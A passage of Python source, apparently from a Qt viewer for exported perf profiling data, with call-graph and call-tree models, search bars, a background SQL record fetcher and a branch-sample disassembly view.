pattern = self.pattern.isChecked()
index = self.textbox.currentIndex()
data = self.textbox.itemData(index)
# Store the pattern in the combo box to keep it with the text value
if data == None:
self.textbox.setItemData(index, pattern)
else:
self.pattern.setChecked(data)
self.Find(0)
def NextPrev(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
if value != self.last_value:
index = self.textbox.findText(value)
# Allow for a button press before the value has been added to the combo box
if index < 0:
index = self.textbox.count()
self.textbox.addItem(value, pattern)
self.textbox.setCurrentIndex(index)
return
else:
self.textbox.setItemData(index, pattern)
elif pattern != self.last_pattern:
# Keep the pattern recorded in the combo box up to date
index = self.textbox.currentIndex()
self.textbox.setItemData(index, pattern)
self.Find(direction)
def NotFound(self):
QMessageBox.information(self.bar, "Find", "'" + self.textbox.currentText() + "' not found")
# Context-sensitive call graph data model item base
class CallGraphLevelItemBase(object):
def __init__(self, glb, row, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.query_done = False;
self.child_count = 0
self.child_items = []
if parent_item:
self.level = parent_item.level + 1
else:
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Context-sensitive call graph data model level 2+ item base
class CallGraphLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, thread_id, call_path_id, time, branch_count, parent_item):
super(CallGraphLevelTwoPlusItemBase, self).__init__(glb, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.call_path_id = call_path_id
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True;
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT call_path_id, name, short_name, COUNT(calls.id), SUM(return_time - call_time), SUM(branch_count)"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE parent_call_path_id = " + str(self.call_path_id) +
" AND comm_id = " + str(self.comm_id) +
" AND thread_id = " + str(self.thread_id) +
" GROUP BY call_path_id, name, short_name"
" ORDER BY call_path_id")
while query.next():
child_item = CallGraphLevelThreeItem(self.glb, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), int(query.value(5)), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model level three item
class CallGraphLevelThreeItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, call_path_id, name, dso, count, time, branch_count, parent_item):
super(CallGraphLevelThreeItem, self).__init__(glb, row, comm_id, thread_id, call_path_id, time, branch_count, parent_item)
dso = dsoname(dso)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = call_path_id
# Context-sensitive call graph data model level two item
class CallGraphLevelTwoItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, pid, tid, parent_item):
super(CallGraphLevelTwoItem, self).__init__(glb, row, comm_id, thread_id, 1, 0, 0, parent_item)
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallGraphLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Context-sensitive call graph data model level one item
class CallGraphLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, comm, parent_item):
super(CallGraphLevelOneItem, self).__init__(glb, row, parent_item)
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True;
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallGraphLevelTwoItem(self.glb, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model root item
class CallGraphRootItem(CallGraphLevelItemBase):
def __init__(self, glb):
super(CallGraphRootItem, self).__init__(glb, 0, None)
self.dbid = 0
self.query_done = True;
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms")
while query.next():
if not query.value(0):
continue
child_item = CallGraphLevelOneItem(glb, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model base
class CallGraphModelBase(TreeModel):
def __init__(self, glb, parent=None):
super(CallGraphModelBase, self).__init__(glb, parent)
def FindSelect(self, value, pattern, query):
if pattern:
# postgresql and sqlite pattern patching differences:
# postgresql LIKE is case sensitive but sqlite LIKE is not
# postgresql LIKE allows % and _ to be escaped with \ but sqlite LIKE does not
# postgresql supports ILIKE which is case insensitive
# sqlite supports GLOB (text only) which uses * and ? and is case sensitive
if not self.glb.dbref.is_sqlite3:
# Escape % and _
s = value.replace("%", "\%")
s = s.replace("_", "\_")
# Translate * and ? into SQL LIKE pattern characters % and _
trans = string.maketrans("*?", "%_")
match = " LIKE '" + str(s).translate(trans) + "'"
else:
match = " GLOB '" + str(value) + "'"
else:
match = " = '" + str(value) + "'"
self.DoFindSelect(query, match)
def Found(self, query, found):
if found:
return self.FindPath(query)
return []
def FindValue(self, value, pattern, query, last_value, last_pattern):
if last_value == value and pattern == last_pattern:
found = query.first()
else:
self.FindSelect(value, pattern, query)
found = query.next()
return self.Found(query, found)
def FindNext(self, query):
found = query.next()
if not found:
found = query.first()
return self.Found(query, found)
def FindPrev(self, query):
found = query.previous()
if not found:
found = query.last()
return self.Found(query, found)
def FindThread(self, c):
if c.direction == 0 or c.value != c.last_value or c.pattern != c.last_pattern:
ids = self.FindValue(c.value, c.pattern, c.query, c.last_value, c.last_pattern)
elif c.direction > 0:
ids = self.FindNext(c.query)
else:
ids = self.FindPrev(c.query)
return (True, ids)
def Find(self, value, direction, pattern, context, callback):
class Context():
def __init__(self, *x):
self.value, self.direction, self.pattern, self.query, self.last_value, self.last_pattern = x
def Update(self, *x):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = x + (self.value, self.pattern)
if len(context):
context[0].Update(value, direction, pattern)
else:
context.append(Context(value, direction, pattern, QSqlQuery(self.glb.db), None, None))
# Use a thread so the UI is not blocked during the SELECT
thread = Thread(self.FindThread, context[0])
thread.done.connect(lambda ids, t=thread, c=callback: self.FindDone(t, c, ids), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, ids):
callback(ids)
# Context-sensitive call graph data model
class CallGraphModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallGraphModel, self).__init__(glb, parent)
def GetRoot(self):
return CallGraphRootItem(self.glb)
def columnCount(self, parent=None):
return 7
def columnHeader(self, column):
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT call_path_id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" GROUP BY comm_id, thread_id, call_path_id"
" ORDER BY comm_id, thread_id, call_path_id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM call_paths"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
# The call path root is not used
if ids[0] == 1:
del ids[0]
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Call tree data model level 2+ item base
class CallTreeLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, thread_id, calls_id, time, branch_count, parent_item):
super(CallTreeLevelTwoPlusItemBase, self).__init__(glb, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.calls_id = calls_id
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True;
if self.calls_id == 0:
comm_thread = " AND comm_id = " + str(self.comm_id) + " AND thread_id = " + str(self.thread_id)
else:
comm_thread = ""
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT calls.id, name, short_name, call_time, return_time - call_time, branch_count"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE calls.parent_id = " + str(self.calls_id) + comm_thread +
" ORDER BY call_time, calls.id")
while query.next():
child_item = CallTreeLevelThreeItem(self.glb, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), int(query.value(5)), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model level three item
class CallTreeLevelThreeItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, calls_id, name, dso, count, time, branch_count, parent_item):
super(CallTreeLevelThreeItem, self).__init__(glb, row, comm_id, thread_id, calls_id, time, branch_count, parent_item)
dso = dsoname(dso)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = calls_id
# Call tree data model level two item
class CallTreeLevelTwoItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, pid, tid, parent_item):
super(CallTreeLevelTwoItem, self).__init__(glb, row, comm_id, thread_id, 0, 0, 0, parent_item)
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallTreeLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Call tree data model level one item
class CallTreeLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, comm, parent_item):
super(CallTreeLevelOneItem, self).__init__(glb, row, parent_item)
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True;
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallTreeLevelTwoItem(self.glb, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model root item
class CallTreeRootItem(CallGraphLevelItemBase):
def __init__(self, glb):
super(CallTreeRootItem, self).__init__(glb, 0, None)
self.dbid = 0
self.query_done = True;
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms")
while query.next():
if not query.value(0):
continue
child_item = CallTreeLevelOneItem(glb, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call Tree data model
class CallTreeModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallTreeModel, self).__init__(glb, parent)
def GetRoot(self):
return CallTreeRootItem(self.glb)
def columnCount(self, parent=None):
return 7
def columnHeader(self, column):
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT calls.id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" ORDER BY comm_id, thread_id, call_time, calls.id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM calls"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Vertical widget layout
class VBox():
def __init__(self, w1, w2, w3=None):
self.vbox = QWidget()
self.vbox.setLayout(QVBoxLayout());
self.vbox.layout().setContentsMargins(0, 0, 0, 0)
self.vbox.layout().addWidget(w1)
self.vbox.layout().addWidget(w2)
if w3:
self.vbox.layout().addWidget(w3)
def Widget(self):
return self.vbox
# Tree window base
class TreeWindowBase(QMdiSubWindow):
def __init__(self, parent=None):
super(TreeWindowBase, self).__init__(parent)
self.model = None
self.find_bar = None
self.view = QTreeView()
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.context_menu = TreeContextMenu(self.view)
def DisplayFound(self, ids):
if not len(ids):
return False
parent = QModelIndex()
for dbid in ids:
found = False
n = self.model.rowCount(parent)
for row in xrange(n):
child = self.model.index(row, 0, parent)
if child.internalPointer().dbid == dbid:
found = True
self.view.setCurrentIndex(child)
parent = child
break
if not found:
break
return found
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.model.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, ids):
found = True
if not self.DisplayFound(ids):
found = False
self.find_bar.Idle()
if not found:
self.find_bar.NotFound()
# Context-sensitive call graph window
class CallGraphWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallGraphWindow, self).__init__(parent)
self.model = LookupCreateModel("Context-Sensitive Call Graph", lambda x=glb: CallGraphModel(x))
self.view.setModel(self.model)
for c, w in ((0, 250), (1, 100), (2, 60), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Context-Sensitive Call Graph")
# Call tree window
class CallTreeWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallTreeWindow, self).__init__(parent)
self.model = LookupCreateModel("Call Tree", lambda x=glb: CallTreeModel(x))
self.view.setModel(self.model)
for c, w in ((0, 230), (1, 100), (2, 100), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Call Tree")
# Child data item finder
class ChildDataItemFinder():
def __init__(self, root):
self.root = root
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (None,) * 5
self.rows = []
self.pos = 0
def FindSelect(self):
self.rows = []
if self.pattern:
pattern = re.compile(self.value)
for child in self.root.child_items:
for column_data in child.data:
if re.search(pattern, str(column_data)) is not None:
self.rows.append(child.row)
break
else:
for child in self.root.child_items:
for column_data in child.data:
if self.value in str(column_data):
self.rows.append(child.row)
break
def FindValue(self):
self.pos = 0
if self.last_value != self.value or self.pattern != self.last_pattern:
self.FindSelect()
if not len(self.rows):
return -1
return self.rows[self.pos]
def FindThread(self):
if self.direction == 0 or self.value != self.last_value or self.pattern != self.last_pattern:
row = self.FindValue()
elif len(self.rows):
if self.direction > 0:
self.pos += 1
if self.pos >= len(self.rows):
self.pos = 0
else:
self.pos -= 1
if self.pos < 0:
self.pos = len(self.rows) - 1
row = self.rows[self.pos]
else:
row = -1
return (True, row)
def Find(self, value, direction, pattern, context, callback):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (value, direction,pattern, self.value, self.pattern)
# Use a thread so the UI is not blocked
thread = Thread(self.FindThread)
thread.done.connect(lambda row, t=thread, c=callback: self.FindDone(t, c, row), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, row):
callback(row)
# Number of database records to fetch in one go
glb_chunk_sz = 10000
# Background process for SQL data fetcher
class SQLFetcherProcess():
def __init__(self, dbref, sql, buffer, head, tail, fetch_count, fetching_done, process_target, wait_event, fetched_event, prep):
# Need a unique connection name
conn_name = "SQLFetcher" + str(os.getpid())
self.db, dbname = dbref.Open(conn_name)
self.sql = sql
self.buffer = buffer
self.head = head
self.tail = tail
self.fetch_count = fetch_count
self.fetching_done = fetching_done
self.process_target = process_target
self.wait_event = wait_event
self.fetched_event = fetched_event
self.prep = prep
self.query = QSqlQuery(self.db)
self.query_limit = 0 if "$$last_id$$" in sql else 2
self.last_id = -1
self.fetched = 0
self.more = True
self.local_head = self.head.value
self.local_tail = self.tail.value
def Select(self):
if self.query_limit:
if self.query_limit == 1:
return
self.query_limit -= 1
stmt = self.sql.replace("$$last_id$$", str(self.last_id))
QueryExec(self.query, stmt)
def Next(self):
if not self.query.next():
self.Select()
if not self.query.next():
return None
self.last_id = self.query.value(0)
return self.prep(self.query)
def WaitForTarget(self):
while True:
self.wait_event.clear()
target = self.process_target.value
if target > self.fetched or target < 0:
break
self.wait_event.wait()
return target
def HasSpace(self, sz):
if self.local_tail <= self.local_head:
space = len(self.buffer) - self.local_head
if space > sz:
return True
if space >= glb_nsz:
# Use 0 (or space < glb_nsz) to mean there is no more at the top of the buffer
nd = pickle.dumps(0, pickle.HIGHEST_PROTOCOL)
self.buffer[self.local_head : self.local_head + len(nd)] = nd
self.local_head = 0
if self.local_tail - self.local_head > sz:
return True
return False
def WaitForSpace(self, sz):
if self.HasSpace(sz):
return
while True:
self.wait_event.clear()
self.local_tail = self.tail.value
if self.HasSpace(sz):
return
self.wait_event.wait()
def AddToBuffer(self, obj):
d = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
n = len(d)
nd = pickle.dumps(n, pickle.HIGHEST_PROTOCOL)
sz = n + glb_nsz
self.WaitForSpace(sz)
pos = self.local_head
self.buffer[pos : pos + len(nd)] = nd
self.buffer[pos + glb_nsz : pos + sz] = d
self.local_head += sz
def FetchBatch(self, batch_size):
fetched = 0
while batch_size > fetched:
obj = self.Next()
if obj is None:
self.more = False
break
self.AddToBuffer(obj)
fetched += 1
if fetched:
self.fetched += fetched
with self.fetch_count.get_lock():
self.fetch_count.value += fetched
self.head.value = self.local_head
self.fetched_event.set()
def Run(self):
while self.more:
target = self.WaitForTarget()
if target < 0:
break
batch_size = min(glb_chunk_sz, target - self.fetched)
self.FetchBatch(batch_size)
self.fetching_done.value = True
self.fetched_event.set()
def SQLFetcherFn(*x):
process = SQLFetcherProcess(*x)
process.Run()
# SQL data fetcher
class SQLFetcher(QObject):
done = Signal(object)
def __init__(self, glb, sql, prep, process_data, parent=None):
super(SQLFetcher, self).__init__(parent)
self.process_data = process_data
self.more = True
self.target = 0
self.last_target = 0
self.fetched = 0
self.buffer_size = 16 * 1024 * 1024
self.buffer = Array(c_char, self.buffer_size, lock=False)
self.head = Value(c_longlong)
self.tail = Value(c_longlong)
self.local_tail = 0
self.fetch_count = Value(c_longlong)
self.fetching_done = Value(c_bool)
self.last_count = 0
self.process_target = Value(c_longlong)
self.wait_event = Event()
self.fetched_event = Event()
glb.AddInstanceToShutdownOnExit(self)
self.process = Process(target=SQLFetcherFn, args=(glb.dbref, sql, self.buffer, self.head, self.tail, self.fetch_count, self.fetching_done, self.process_target, self.wait_event, self.fetched_event, prep))
self.process.start()
self.thread = Thread(self.Thread)
self.thread.done.connect(self.ProcessData, Qt.QueuedConnection)
self.thread.start()
def Shutdown(self):
# Tell the thread and process to exit
self.process_target.value = -1
self.wait_event.set()
self.more = False
self.fetching_done.value = True
self.fetched_event.set()
def Thread(self):
if not self.more:
return True, 0
while True:
self.fetched_event.clear()
fetch_count = self.fetch_count.value
if fetch_count != self.last_count:
break
if self.fetching_done.value:
self.more = False
return True, 0
self.fetched_event.wait()
count = fetch_count - self.last_count
self.last_count = fetch_count
self.fetched += count
return False, count
def Fetch(self, nr):
if not self.more:
# -1 inidcates there are no more
return -1
result = self.fetched
extra = result + nr - self.target
if extra > 0:
self.target += extra
# process_target < 0 indicates shutting down
if self.process_target.value >= 0:
self.process_target.value = self.target
self.wait_event.set()
return result
def RemoveFromBuffer(self):
pos = self.local_tail
if len(self.buffer) - pos < glb_nsz:
pos = 0
n = pickle.loads(self.buffer[pos : pos + glb_nsz])
if n == 0:
pos = 0
n = pickle.loads(self.buffer[0 : glb_nsz])
pos += glb_nsz
obj = pickle.loads(self.buffer[pos : pos + n])
self.local_tail = pos + n
return obj
def ProcessData(self, count):
for i in xrange(count):
obj = self.RemoveFromBuffer()
self.process_data(obj)
self.tail.value = self.local_tail
self.wait_event.set()
self.done.emit(count)
# Fetch more records bar
class FetchMoreRecordsBar():
def __init__(self, model, parent):
self.model = model
self.label = QLabel("Number of records (x " + "{:,}".format(glb_chunk_sz) + ") to fetch:")
self.label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch_count = QSpinBox()
self.fetch_count.setRange(1, 1000000)
self.fetch_count.setValue(10)
self.fetch_count.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch = QPushButton("Go!")
self.fetch.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch.released.connect(self.FetchMoreRecords)
self.progress = QProgressBar()
self.progress.setRange(0, 100)
self.progress.hide()
self.done_label = QLabel("All records fetched")
self.done_label.hide()
self.spacer = QLabel("")
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(self.label)
self.hbox.addWidget(self.fetch_count)
self.hbox.addWidget(self.fetch)
self.hbox.addWidget(self.spacer)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.done_label)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox);
self.bar.show()
self.in_progress = False
self.model.progress.connect(self.Progress)
self.done = False
if not model.HasMoreRecords():
self.Done()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.fetch.setFocus()
def Deactivate(self):
self.bar.hide()
def Enable(self, enable):
self.fetch.setEnabled(enable)
self.fetch_count.setEnabled(enable)
def Busy(self):
self.Enable(False)
self.fetch.hide()
self.spacer.hide()
self.progress.show()
def Idle(self):
self.in_progress = False
self.Enable(True)
self.progress.hide()
self.fetch.show()
self.spacer.show()
def Target(self):
return self.fetch_count.value() * glb_chunk_sz
def Done(self):
self.done = True
self.Idle()
self.label.hide()
self.fetch_count.hide()
self.fetch.hide()
self.spacer.hide()
self.done_label.show()
def Progress(self, count):
if self.in_progress:
if count:
percent = ((count - self.start) * 100) / self.Target()
if percent >= 100:
self.Idle()
else:
self.progress.setValue(percent)
if not count:
# Count value of zero means no more records
self.Done()
def FetchMoreRecords(self):
if self.done:
return
self.progress.setValue(0)
self.Busy()
self.in_progress = True
self.start = self.model.FetchMoreRecords(self.Target())
# Brance data model level two item
class BranchLevelTwoItem():
def __init__(self, row, text, parent_item):
self.row = row
self.parent_item = parent_item
self.data = [""] * 8
self.data[7] = text
self.level = 2
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
return 0
def hasChildren(self):
return False
def getData(self, column):
return self.data[column]
# Brance data model level one item
class BranchLevelOneItem():
def __init__(self, glb, row, data, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.child_count = 0
self.child_items = []
self.data = data[1:]
self.dbid = data[0]
self.level = 1
self.query_done = False
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def Select(self):
self.query_done = True
if not self.glb.have_disassembler:
return
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT cpu, to_dso_id, to_symbol_id, to_sym_offset, short_name, long_name, build_id, sym_start, to_ip"
" FROM samples"
" INNER JOIN dsos ON samples.to_dso_id = dsos.id"
" INNER JOIN symbols ON samples.to_symbol_id = symbols.id"
" WHERE samples.id = " + str(self.dbid))
if not query.next():
return
cpu = query.value(0)
dso = query.value(1)
sym = query.value(2)
if dso == 0 or sym == 0:
return
off = query.value(3)
short_name = query.value(4)
long_name = query.value(5)
build_id = query.value(6)
sym_start = query.value(7)
ip = query.value(8)
QueryExec(query, "SELECT samples.dso_id, symbol_id, sym_offset, sym_start"
" FROM samples"
" INNER JOIN symbols ON samples.symbol_id = symbols.id"
" WHERE samples.id > " + str(self.dbid) + " AND cpu = " + str(cpu) +
" ORDER BY samples.id"
" LIMIT 1")
if not query.next():
return
if query.value(0) != dso:
# Cannot disassemble from one dso to another
return
bsym = query.value(1)
boff = query.value(2)
bsym_start = query.value(3)
if bsym == 0:
return
tot = bsym_start + boff + 1 - sym_start - off
if tot <= 0 or tot > 16384:
return
inst = self.glb.disassembler.Instruction()
f = self.glb.FileFromNamesAndBuildId(short_name, long_name, build_id)
if not f:
return
mode = 0 if Is64Bit(f) else 1
self.glb.disassembler.SetMode(inst, mode)
buf_sz = tot + 16
buf = create_string_buffer(tot + 16)
f.seek(sym_start + off)
buf.value = f.read(buf_sz)
buf_ptr = addressof(buf)
i = 0
while tot > 0:
cnt, text = self.glb.disassembler.DisassembleOne(inst, buf_ptr, buf_sz, ip)
if cnt:
byte_str = tohex(ip).rjust(16)
for k in xrange(cnt):
byte_str += " %02x" % ord(buf[i])
i += 1
while k < 15:
byte_str += " "
k += 1
self.child_items.append(BranchLevelTwoItem(0, byte_str + " " + text, self))
self.child_count += 1
else:
return
buf_ptr += cnt
tot -= cnt
buf_sz -= cnt
ip += cnt
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Brance data model root item
class BranchRootItem():
def __init__(self):
self.child_count = 0
self.child_items = []
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return None
def getRow(self):
return 0
def childCount(self):
return self.child_count
def hasChildren(self):
return self.child_count > 0
def getData(self, column):
return ""
# Branch data preparation
def BranchDataPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
return data
def BranchDataPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
return data
# Branch data model
class BranchModel(TreeModel):
progress = Signal(object)
def __init__(self, glb, event_id, where_clause, parent=None):
super(BranchModel, self).__init__(glb, parent)
self.event_id = event_id
self.more = True
self.populated = 0
sql = ("SELECT samples.id, time, cpu, comm, pid, tid, branch_types.name,"
" CASE WHEN in_tx = '0' THEN 'No' ELSE 'Yes' END,"
" ip, symbols.name, sym_offset, dsos.short_name,"
" to_ip, to_symbols.name, to_sym_offset, to_dsos.short_name"
" FROM samples"
" INNER JOIN comms ON comm_id = comms.id"
" INNER JOIN threads ON thread_id = threads.id"
" INNER JOIN branch_types ON branch_type = branch_types.id"
" INNER JOIN symbols ON symbol_id = symbols.id"
" INNER JOIN symbols to_symbols ON to_symbol_id = to_symbols.id"
" INNER JOIN dsos ON samples.dso_id = dsos.id"
" INNER JOIN dsos AS to_dsos ON samples.to_dso_id = to_dsos.id"
" WHERE samples.id > $$last_id$$" + where_clause +
" AND evsel_id = " + str(self.event_id) +
" ORDER BY samples.id"
" LIMIT " + str(glb_chunk_sz))
if pyside_version_1 and sys.version_info[0] == 3:
prep = BranchDataPrepWA
else:
prep = BranchDataPrep
self.fetcher = SQLFetcher(glb, sql, prep, self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def GetRoot(self):
return BranchRootItem()
def columnCount(self, parent=None):
return 8
def columnHeader(self, column):
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Branch")[column]
def columnFont(self, column):
if column != 7:
return None
return QFont("Monospace")
def DisplayData(self, item, index):
if item.level == 1:
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = BranchLevelOneItem(self.glb, self.populated, data, self.root)
self.root.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.root.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.root.child_count += count
self.endInsertRows()
self.progress.emit(self.root.child_count)
def FetchMoreRecords(self, count):
current = self.root.child_count
if self.more:
